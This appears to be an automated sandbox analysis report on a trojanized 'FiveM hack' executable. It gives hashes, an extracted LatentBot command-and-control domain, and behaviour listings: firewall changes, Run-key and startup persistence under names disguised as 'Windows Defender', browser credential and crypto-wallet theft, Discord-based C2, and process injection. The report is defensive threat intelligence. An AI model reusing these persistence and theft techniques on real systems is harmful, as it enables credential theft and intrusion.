Resubmissions
24-01-2025 23:14
250124-27yspavnbr 724-01-2025 23:02
250124-21dtyavkap 1019-01-2025 16:29
250119-tzgv7swkcv 10Analysis
-
max time kernel
150s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
19-01-2025 16:29
Static task
static1
Behavioral task
behavioral1
Sample
FiveMHackV2.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
FiveMHackV2.exe
Resource
win10v2004-20241007-en
General
-
Target
FiveMHackV2.exe
-
Size
26.2MB
-
MD5
0a80c7be4e77b4b2f9e580c26a0b5d13
-
SHA1
7525eaf2118d893c6a73fa5471f6adea4e75e164
-
SHA256
8028313f8ccc23c6cb1b07927d5e3a5e5aff66f36f2ce67be49cb96372722d76
-
SHA512
362cb3f5306cb978bc7d8e7240023c9f859a9907a07b03df4756ea48b02c0b68ddf751719b13027bd2447d9b2d1d598e210c744c4b4e1bcc11d9d17b783a1169
-
SSDEEP
786432:SKP9F8JjEdm7SJtWqwkd7q+XlR43OnDgUd4Z+c:P7qEdm7SHWqwGxXX43cDgUd4ZV
Malware Config
Extracted
latentbot
nikomklkahba.zapto.org
Signatures
-
Latentbot family
-
Njrat family
-
pid Process 5016 powershell.exe 4836 powershell.exe 1616 powershell.exe 4424 powershell.exe 4420 powershell.exe 2772 powershell.exe -
Modifies Windows Firewall 2 TTPs 3 IoCs
pid Process 4428 netsh.exe 2480 netsh.exe 4988 netsh.exe -
Checks computer location settings 2 TTPs 6 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation FiveMHackV2.exe Key value queried \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation FiveM Hack V1.exe Key value queried \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation Client.exe Key value queried \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation Setup.exe Key value queried \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation Rename_Z60IHLDjO6.exe Key value queried \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation Setup.exe -
Clipboard Data 1 TTPs 2 IoCs
Adversaries may collect data stored in the clipboard from users copying information within or between applications.
pid Process 4908 cmd.exe 3540 powershell.exe -
Drops startup file 6 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4ce4232fc398063865fce10fcca4f582.exe Windows Services.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4ce4232fc398063865fce10fcca4f582.exe Windows Services.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4aa238bbbf6c461548a622535aabe462.exe Windows Defender.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4aa238bbbf6c461548a622535aabe462.exe Windows Defender.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c3b6f282e0a1f239e3d9037ed996682d.exe Windows Defender.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c3b6f282e0a1f239e3d9037ed996682d.exe Windows Defender.exe -
Executes dropped EXE 14 IoCs
pid Process 4896 FiveM Hack V1.exe 2092 CheatEngine75.exe 2728 CheatEngine75.tmp 4344 Client.exe 2736 Windows Services.exe 1464 Setup.exe 1732 Windows Defender.exe 3120 Rename_Z60IHLDjO6.exe 4796 python-installer.exe 2908 FiveM Hack.exe 2332 FiveM Hack.exe 5976 rar.exe 2292 Setup.exe 2380 Windows Defender.exe -
Loads dropped DLL 23 IoCs
pid Process 2728 CheatEngine75.tmp 2728 CheatEngine75.tmp 2728 CheatEngine75.tmp 3120 Rename_Z60IHLDjO6.exe 4688 python-installer.exe 2332 FiveM Hack.exe 2332 FiveM Hack.exe 2332 FiveM Hack.exe 2332 FiveM Hack.exe 2332 FiveM Hack.exe 2332 FiveM Hack.exe 2332 FiveM Hack.exe 2332 FiveM Hack.exe 2332 FiveM Hack.exe 2332 FiveM Hack.exe 2332 FiveM Hack.exe 2332 FiveM Hack.exe 2332 FiveM Hack.exe 2332 FiveM Hack.exe 2332 FiveM Hack.exe 2332 FiveM Hack.exe 2332 FiveM Hack.exe 2332 FiveM Hack.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 8 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\{316e3b12-1191-47df-b9d4-dcf0bf2f6cc4} = "\"C:\\Users\\Admin\\AppData\\Local\\Package Cache\\{316e3b12-1191-47df-b9d4-dcf0bf2f6cc4}\\python-3.12.6-amd64.exe\" /burn.runonce" python-installer.exe Set value (str) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\c3b6f282e0a1f239e3d9037ed996682d = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\Windows Defender.exe\" .." Windows Defender.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\c3b6f282e0a1f239e3d9037ed996682d = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\Windows Defender.exe\" .." Windows Defender.exe Set value (str) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\4ce4232fc398063865fce10fcca4f582 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\Windows Services.exe\" .." Windows Services.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\4ce4232fc398063865fce10fcca4f582 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\Windows Services.exe\" .." Windows Services.exe Set value (str) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Rename_Z60IHLDjO6 = "C:\\ProgramData\\Update.vbs" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\4aa238bbbf6c461548a622535aabe462 = "\"C:\\Users\\Admin\\AppData\\Roaming\\Windows Defender.exe\" .." Windows Defender.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\4aa238bbbf6c461548a622535aabe462 = "\"C:\\Users\\Admin\\AppData\\Roaming\\Windows Defender.exe\" .." Windows Defender.exe -
Blocklisted process makes network request 1 IoCs
flow pid Process 44 2316 msiexec.exe -
Drops desktop.ini file(s) 1 IoCs
description ioc Process File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Python 3.12\desktop.ini msiexec.exe -
Enumerates connected drives 3 TTPs 23 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\W: msiexec.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
flow ioc 36 discord.com 39 discord.com 51 discord.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 49 ip-api.com -
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
-
An obfuscated cmd.exe command-line is typically used to evade detection. 2 IoCs
pid Process 5060 cmd.exe 264 cmd.exe -
Drops file in System32 directory 2 IoCs
description ioc Process File created C:\Windows\System32\a579jkj8r8.txt Rename_Z60IHLDjO6.exe File opened for modification C:\Windows\System32\a579jkj8r8.txt Rename_Z60IHLDjO6.exe -
Enumerates processes with tasklist 1 TTPs 5 IoCs
pid Process 3360 tasklist.exe 1836 tasklist.exe 4356 tasklist.exe 4168 tasklist.exe 1068 tasklist.exe -
resource yara_rule behavioral2/files/0x0008000000023d51-790.dat upx behavioral2/memory/2332-794-0x00007FFE51980000-0x00007FFE51F68000-memory.dmp upx behavioral2/files/0x0008000000023d4f-798.dat upx behavioral2/memory/2332-801-0x00007FFE66A50000-0x00007FFE66A5F000-memory.dmp upx behavioral2/memory/2332-799-0x00007FFE54B00000-0x00007FFE54B24000-memory.dmp upx behavioral2/files/0x0008000000023cd7-797.dat upx behavioral2/memory/2332-815-0x00007FFE54AD0000-0x00007FFE54AFD000-memory.dmp upx behavioral2/memory/2332-817-0x00007FFE54A80000-0x00007FFE54AA3000-memory.dmp upx behavioral2/memory/2332-818-0x00007FFE51800000-0x00007FFE51973000-memory.dmp upx behavioral2/memory/2332-816-0x00007FFE54AB0000-0x00007FFE54AC9000-memory.dmp upx behavioral2/memory/2332-820-0x00007FFE64E10000-0x00007FFE64E1D000-memory.dmp upx behavioral2/memory/2332-819-0x00007FFE517E0000-0x00007FFE517F9000-memory.dmp upx behavioral2/memory/2332-821-0x00007FFE517B0000-0x00007FFE517DE000-memory.dmp upx behavioral2/memory/2332-826-0x00007FFE54B00000-0x00007FFE54B24000-memory.dmp upx behavioral2/memory/2332-825-0x00007FFE51370000-0x00007FFE516E5000-memory.dmp upx behavioral2/memory/2332-823-0x00007FFE516F0000-0x00007FFE517A8000-memory.dmp upx behavioral2/memory/2332-822-0x00007FFE51980000-0x00007FFE51F68000-memory.dmp upx behavioral2/memory/2332-827-0x00007FFE51350000-0x00007FFE51364000-memory.dmp upx behavioral2/memory/2332-828-0x00007FFE64CE0000-0x00007FFE64CED000-memory.dmp upx behavioral2/memory/2332-829-0x00007FFE54AB0000-0x00007FFE54AC9000-memory.dmp upx behavioral2/memory/2332-830-0x00007FFE51230000-0x00007FFE5134C000-memory.dmp upx behavioral2/memory/2332-849-0x00007FFE54A80000-0x00007FFE54AA3000-memory.dmp upx behavioral2/memory/2332-875-0x00007FFE51800000-0x00007FFE51973000-memory.dmp upx behavioral2/memory/2332-915-0x00007FFE517E0000-0x00007FFE517F9000-memory.dmp upx behavioral2/memory/2332-917-0x00007FFE517B0000-0x00007FFE517DE000-memory.dmp upx behavioral2/memory/2332-920-0x00007FFE516F0000-0x00007FFE517A8000-memory.dmp upx behavioral2/memory/2332-922-0x00007FFE51370000-0x00007FFE516E5000-memory.dmp upx behavioral2/memory/2332-949-0x00007FFE51800000-0x00007FFE51973000-memory.dmp upx behavioral2/memory/2332-957-0x00007FFE51230000-0x00007FFE5134C000-memory.dmp upx behavioral2/memory/2332-943-0x00007FFE51980000-0x00007FFE51F68000-memory.dmp upx behavioral2/memory/2332-944-0x00007FFE54B00000-0x00007FFE54B24000-memory.dmp upx behavioral2/memory/2332-958-0x00007FFE51980000-0x00007FFE51F68000-memory.dmp upx behavioral2/memory/2332-986-0x00007FFE51230000-0x00007FFE5134C000-memory.dmp upx behavioral2/memory/2332-985-0x00007FFE64CE0000-0x00007FFE64CED000-memory.dmp upx behavioral2/memory/2332-984-0x00007FFE51350000-0x00007FFE51364000-memory.dmp upx behavioral2/memory/2332-983-0x00007FFE516F0000-0x00007FFE517A8000-memory.dmp upx behavioral2/memory/2332-982-0x00007FFE517B0000-0x00007FFE517DE000-memory.dmp upx behavioral2/memory/2332-981-0x00007FFE64E10000-0x00007FFE64E1D000-memory.dmp upx behavioral2/memory/2332-980-0x00007FFE517E0000-0x00007FFE517F9000-memory.dmp upx behavioral2/memory/2332-979-0x00007FFE51800000-0x00007FFE51973000-memory.dmp upx behavioral2/memory/2332-978-0x00007FFE54A80000-0x00007FFE54AA3000-memory.dmp upx behavioral2/memory/2332-977-0x00007FFE54AB0000-0x00007FFE54AC9000-memory.dmp upx behavioral2/memory/2332-976-0x00007FFE54AD0000-0x00007FFE54AFD000-memory.dmp upx behavioral2/memory/2332-975-0x00007FFE66A50000-0x00007FFE66A5F000-memory.dmp upx behavioral2/memory/2332-974-0x00007FFE54B00000-0x00007FFE54B24000-memory.dmp upx behavioral2/memory/2332-973-0x00007FFE51370000-0x00007FFE516E5000-memory.dmp upx -
Drops file in Windows directory 17 IoCs
description ioc Process File opened for modification C:\Windows\Installer\e5856df.msi msiexec.exe File opened for modification C:\Windows\Installer\MSI61A5.tmp msiexec.exe File created C:\Windows\Installer\e5856da.msi msiexec.exe File created C:\Windows\Installer\SourceHash{537B2AF5-504B-4303-99CB-FDE56F47AA51} msiexec.exe File opened for modification C:\Windows\Installer\MSI5C35.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI685D.tmp msiexec.exe File created C:\Windows\Installer\inprogressinstallinfo.ipi msiexec.exe File opened for modification C:\Windows\Installer\MSI5975.tmp msiexec.exe File created C:\Windows\Installer\e5856df.msi msiexec.exe File opened for modification C:\Windows\Installer\e5856d5.msi msiexec.exe File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log msiexec.exe File created C:\Windows\Installer\e5856d9.msi msiexec.exe File opened for modification C:\Windows\Installer\e5856da.msi msiexec.exe File created C:\Windows\Installer\e5856de.msi msiexec.exe File created C:\Windows\Installer\e5856d5.msi msiexec.exe File opened for modification C:\Windows\Installer\ msiexec.exe File created C:\Windows\Installer\SourceHash{901B913C-FA63-48D2-9842-7D7676739378} msiexec.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 9 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe -
System Location Discovery: System Language Discovery 1 TTPs 13 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Windows Defender.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language CheatEngine75.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Client.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language python-installer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language python-installer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language CheatEngine75.tmp Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Windows Services.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Setup.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Windows Defender.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Setup.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 1088 WMIC.exe -
Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.
pid Process 4796 systeminfo.exe -
Modifies registry class 35 IoCs
description ioc Process Key deleted \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Installer\Dependencies\{901B913C-FA63-48D2-9842-7D7676739378}\Dependents\{316e3b12-1191-47df-b9d4-dcf0bf2f6cc4} python-installer.exe Key created \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Installer python-installer.exe Key created \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Installer\Dependencies python-installer.exe Set value (str) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Installer\Dependencies\{901B913C-FA63-48D2-9842-7D7676739378}\ = "{901B913C-FA63-48D2-9842-7D7676739378}" python-installer.exe Set value (str) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Installer\Dependencies\{901B913C-FA63-48D2-9842-7D7676739378}\Version = "3.12.6150.0" python-installer.exe Set value (str) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Installer\Dependencies\{537B2AF5-504B-4303-99CB-FDE56F47AA51}\ = "{537B2AF5-504B-4303-99CB-FDE56F47AA51}" python-installer.exe Set value (str) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Installer\Dependencies\CPython-3.12\Version = "3.12.6150.0" python-installer.exe Key created \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Installer\Dependencies\{537B2AF5-504B-4303-99CB-FDE56F47AA51}\Dependents python-installer.exe Set value (str) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Installer\Dependencies\{2F4E9933-7587-4D85-9BA1-F2903AFB36D8}\DisplayName = "Python 3.12.6 Development Libraries (64-bit)" python-installer.exe Key deleted \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Installer\Dependencies\{901B913C-FA63-48D2-9842-7D7676739378}\Dependents python-installer.exe Key created \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Installer\Dependencies\{901B913C-FA63-48D2-9842-7D7676739378}\Dependents python-installer.exe Key created \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Installer\Dependencies\{537B2AF5-504B-4303-99CB-FDE56F47AA51} python-installer.exe Key deleted \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Installer\Dependencies\CPython-3.12\Dependents python-installer.exe Set value (str) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Installer\Dependencies\CPython-3.12\DisplayName = "Python 3.12.6 (64-bit)" python-installer.exe Key created \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Installer\Dependencies\{901B913C-FA63-48D2-9842-7D7676739378} python-installer.exe Key created \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Installer\Dependencies\{537B2AF5-504B-4303-99CB-FDE56F47AA51}\Dependents\{316e3b12-1191-47df-b9d4-dcf0bf2f6cc4} python-installer.exe Key created \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Installer\Dependencies\{2F4E9933-7587-4D85-9BA1-F2903AFB36D8} python-installer.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ msiexec.exe Key created \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Installer\Dependencies\CPython-3.12\Dependents\{316e3b12-1191-47df-b9d4-dcf0bf2f6cc4} python-installer.exe Key created \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Installer\Dependencies\CPython-3.12\Dependents python-installer.exe Set value (str) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Installer\Dependencies\{2F4E9933-7587-4D85-9BA1-F2903AFB36D8}\Version = "3.12.6150.0" python-installer.exe Key deleted \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Installer\Dependencies\{537B2AF5-504B-4303-99CB-FDE56F47AA51}\Dependents python-installer.exe Key deleted \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Installer\Dependencies\{537B2AF5-504B-4303-99CB-FDE56F47AA51} python-installer.exe Key deleted \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Installer\Dependencies\CPython-3.12 python-installer.exe Set value (str) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Installer\Dependencies\CPython-3.12\ = "{316e3b12-1191-47df-b9d4-dcf0bf2f6cc4}" python-installer.exe Set value (str) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Installer\Dependencies\{901B913C-FA63-48D2-9842-7D7676739378}\DisplayName = "Python 3.12.6 Core Interpreter (64-bit)" python-installer.exe Set value (str) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Installer\Dependencies\{537B2AF5-504B-4303-99CB-FDE56F47AA51}\Version = "3.12.6150.0" python-installer.exe Set value (str) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Installer\Dependencies\{537B2AF5-504B-4303-99CB-FDE56F47AA51}\DisplayName = "Python 3.12.6 Executables (64-bit)" python-installer.exe Set value (str) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Installer\Dependencies\{2F4E9933-7587-4D85-9BA1-F2903AFB36D8}\ = "{2F4E9933-7587-4D85-9BA1-F2903AFB36D8}" python-installer.exe Key created \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Installer\Dependencies\CPython-3.12 python-installer.exe Key deleted \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Installer\Dependencies\{2F4E9933-7587-4D85-9BA1-F2903AFB36D8} python-installer.exe Key deleted \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Installer\Dependencies\{901B913C-FA63-48D2-9842-7D7676739378} python-installer.exe Key deleted \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Installer\Dependencies\CPython-3.12\Dependents\{316e3b12-1191-47df-b9d4-dcf0bf2f6cc4} python-installer.exe Key created \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Installer\Dependencies\{901B913C-FA63-48D2-9842-7D7676739378}\Dependents\{316e3b12-1191-47df-b9d4-dcf0bf2f6cc4} python-installer.exe Key deleted \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Installer\Dependencies\{537B2AF5-504B-4303-99CB-FDE56F47AA51}\Dependents\{316e3b12-1191-47df-b9d4-dcf0bf2f6cc4} python-installer.exe -
Suspicious behavior: EnumeratesProcesses 39 IoCs
pid Process 5016 powershell.exe 5016 powershell.exe 1692 powershell.exe 1692 powershell.exe 1692 powershell.exe 4688 powershell.exe 4688 powershell.exe 4424 powershell.exe 4424 powershell.exe 4420 powershell.exe 4420 powershell.exe 2316 msiexec.exe 2316 msiexec.exe 2316 msiexec.exe 2316 msiexec.exe 2316 msiexec.exe 2316 msiexec.exe 2316 msiexec.exe 2316 msiexec.exe 2316 msiexec.exe 2316 msiexec.exe 2772 powershell.exe 2772 powershell.exe 2772 powershell.exe 4836 powershell.exe 4836 powershell.exe 4836 powershell.exe 3540 powershell.exe 3540 powershell.exe 3612 powershell.exe 3612 powershell.exe 3540 powershell.exe 3612 powershell.exe 1616 powershell.exe 1616 powershell.exe 1616 powershell.exe 456 powershell.exe 456 powershell.exe 456 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 5016 powershell.exe Token: SeDebugPrivilege 1068 tasklist.exe Token: SeDebugPrivilege 3360 tasklist.exe Token: SeDebugPrivilege 1692 powershell.exe Token: SeDebugPrivilege 4688 powershell.exe Token: SeIncreaseQuotaPrivilege 4740 WMIC.exe Token: SeSecurityPrivilege 4740 WMIC.exe Token: SeTakeOwnershipPrivilege 4740 WMIC.exe Token: SeLoadDriverPrivilege 4740 WMIC.exe Token: SeSystemProfilePrivilege 4740 WMIC.exe Token: SeSystemtimePrivilege 4740 WMIC.exe Token: SeProfSingleProcessPrivilege 4740 WMIC.exe Token: SeIncBasePriorityPrivilege 4740 WMIC.exe Token: SeCreatePagefilePrivilege 4740 WMIC.exe Token: SeBackupPrivilege 4740 WMIC.exe Token: SeRestorePrivilege 4740 WMIC.exe Token: SeShutdownPrivilege 4740 WMIC.exe Token: SeDebugPrivilege 4740 WMIC.exe Token: SeSystemEnvironmentPrivilege 4740 WMIC.exe Token: SeRemoteShutdownPrivilege 4740 WMIC.exe Token: SeUndockPrivilege 4740 WMIC.exe Token: SeManageVolumePrivilege 4740 WMIC.exe Token: 33 4740 WMIC.exe Token: 34 4740 WMIC.exe Token: 35 4740 WMIC.exe Token: 36 4740 WMIC.exe Token: SeDebugPrivilege 4424 powershell.exe Token: SeIncreaseQuotaPrivilege 4740 WMIC.exe Token: SeSecurityPrivilege 4740 WMIC.exe Token: SeTakeOwnershipPrivilege 4740 WMIC.exe Token: SeLoadDriverPrivilege 4740 WMIC.exe Token: SeSystemProfilePrivilege 4740 WMIC.exe Token: SeSystemtimePrivilege 4740 WMIC.exe Token: SeProfSingleProcessPrivilege 4740 WMIC.exe Token: SeIncBasePriorityPrivilege 4740 WMIC.exe Token: SeCreatePagefilePrivilege 4740 WMIC.exe Token: SeBackupPrivilege 4740 WMIC.exe Token: SeRestorePrivilege 4740 WMIC.exe Token: SeShutdownPrivilege 4740 WMIC.exe Token: SeDebugPrivilege 4740 WMIC.exe Token: SeSystemEnvironmentPrivilege 4740 WMIC.exe Token: SeRemoteShutdownPrivilege 4740 WMIC.exe Token: SeUndockPrivilege 4740 WMIC.exe Token: SeManageVolumePrivilege 4740 WMIC.exe Token: 33 4740 WMIC.exe Token: 34 4740 WMIC.exe Token: 35 4740 WMIC.exe Token: 36 4740 WMIC.exe Token: SeDebugPrivilege 4420 powershell.exe Token: SeIncreaseQuotaPrivilege 2896 WMIC.exe Token: SeSecurityPrivilege 2896 WMIC.exe Token: SeTakeOwnershipPrivilege 2896 WMIC.exe Token: SeLoadDriverPrivilege 2896 WMIC.exe Token: SeSystemProfilePrivilege 2896 WMIC.exe Token: SeSystemtimePrivilege 2896 WMIC.exe Token: SeProfSingleProcessPrivilege 2896 WMIC.exe Token: SeIncBasePriorityPrivilege 2896 WMIC.exe Token: SeCreatePagefilePrivilege 2896 WMIC.exe Token: SeBackupPrivilege 2896 WMIC.exe Token: SeRestorePrivilege 2896 WMIC.exe Token: SeShutdownPrivilege 2896 WMIC.exe Token: SeDebugPrivilege 2896 WMIC.exe Token: SeSystemEnvironmentPrivilege 2896 WMIC.exe Token: SeRemoteShutdownPrivilege 2896 WMIC.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 2728 CheatEngine75.tmp -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4712 wrote to memory of 4896 4712 FiveMHackV2.exe 83 PID 4712 wrote to memory of 4896 4712 FiveMHackV2.exe 83 PID 4896 wrote to memory of 2092 4896 FiveM Hack V1.exe 85 PID 4896 wrote to memory of 2092 4896 FiveM Hack V1.exe 85 PID 4896 wrote to memory of 2092 4896 FiveM Hack V1.exe 85 PID 2092 wrote to memory of 2728 2092 CheatEngine75.exe 86 PID 2092 wrote to memory of 2728 2092 CheatEngine75.exe 86 PID 2092 wrote to memory of 2728 2092 CheatEngine75.exe 86 PID 4896 wrote to memory of 4344 4896 FiveM Hack V1.exe 96 PID 4896 wrote to memory of 4344 4896 FiveM Hack V1.exe 96 PID 4896 wrote to memory of 4344 4896 FiveM Hack V1.exe 96 PID 4344 wrote to memory of 2736 4344 Client.exe 101 PID 4344 wrote to memory of 2736 4344 Client.exe 101 PID 4344 wrote to memory of 2736 4344 Client.exe 101 PID 4896 wrote to memory of 1464 4896 FiveM Hack V1.exe 102 PID 4896 wrote to memory of 1464 4896 FiveM Hack V1.exe 102 PID 4896 wrote to memory of 1464 4896 FiveM Hack V1.exe 102 PID 2736 wrote to memory of 4428 2736 Windows Services.exe 107 PID 2736 wrote to memory of 4428 2736 Windows Services.exe 107 PID 2736 wrote to 